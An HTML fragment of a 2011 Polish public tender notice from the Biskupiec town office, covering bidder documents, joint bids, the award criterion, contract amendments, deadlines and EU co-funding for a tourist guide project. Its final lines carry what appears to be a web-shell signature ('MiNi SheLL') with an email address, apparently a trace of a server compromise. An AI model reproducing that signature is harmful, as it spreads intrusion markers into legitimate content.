<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku, poza wymogiem przedstawienia oświadczenia - załącznika 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik 1 do SIWZ.
2. Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcom (załącznik  5 do SIWZ). Nie dołączenie do oferty załącznika  5 do SIWZ Zamawiający potraktuje jako deklarację wykonania zamówienia samodzielnie, bez udziału podwykonawców.
3.  Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa również oświadczenia/dokumenty, o których mowa w niniejszej SIWZ.
5.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy:
a.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego  ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b.	W takim przypadku - oprócz dokumentów wymienionych w specyfikacji - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. a. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
c.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia ( art. 23 ust. 3 ustawy Pzp.). Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia obowiązany jest wykazać, iż nie podlega wykluczeniu z udziału w postępowaniu, w świetle art. 24 ust. 1 ustawy Pzp. Natomiast  warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp, mogą być spełnione przez wykonawców wspólnie ubiegających o udzielenie zamówienia łącznie.
6.Dowód wniesienia wadium zgodnie z rozdziałem IX pkt.  6 SIWZ. 
Forma dokumentów.
1. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
2. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
3.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w Rozdziale VI SIWZ, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
4.  Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany treści umowy zawartej z Wykonawcą na niniejsze zamówienie możliwe będą jedynie w trybie art. 144 ustawy Prawo zamówień publicznych i mogą nastąpić tylko na piśmie w formie aneksu pod rygorem nieważności w niżej opisanych przypadkach: 

1. Przyczyna - Wystąpienie zdarzeń losowych - klęska żywiołowa. 
Skutek - zmiana w umowie/aneks - Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót. 
2. Przyczyna - Wystąpienie zamówień dodatkowych zgodnie z art. 67 ust.1 pkt. 5 ustawy Prawo zamówień publicznych 
Skutek - zmiana w umowie/aneks - Zmiana terminu wykonania usługi o okres odpowiadający terminowi trwania zamówienia dodatkowego. 
3. Przyczyna - wydłużenie się procesu administracyjnego związanego z uzyskaniem opinii i uzgodnień, nie wynikających z winy Zamawiającego lub Wykonawcy,
Skutek - zmiana w umowie/aneks - Przedłużenie terminu realizacji umowy o tyle dni, ile trwało wydłużenie się procesu administracyjnego związanego z uzyskaniem opinii i uzgodnień nie wynikających z winy Zamawiającego lub Wykonawcy,
4. Przyczyna - Przekształcenie firmy, zmiana nazwy firmy. 
Skutek - zmiana w umowie/aneks - Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy. 

W razie wystąpienia powyższych przesłanek, Wykonawca jest zobowiązany do ich udokumentowania w sposób nie budzący zastrzeżeń (protokół konieczności, oświadczenie dokumentacja, fotograficzna, notatka itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biskupiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
al. Niepodległości 2, 11-300 Biskupiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2011 godzina 10:00, miejsce: Urząd Miejski 
al. Niepodległości 2, 11-300 Biskupiec
pokój nr 10 (KANCELARIA), parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w związku z umową o dofinansowanie projektu
Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur wraz z infoznakowaniem na terenie Gminy
w ramach Osi Priorytetowej 2 - Turystyka Działanie 2.2 Promocja województwa i jego oferty turystycznej Regionalnego Programu Operacyjnego Warmia i Mazury 
na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com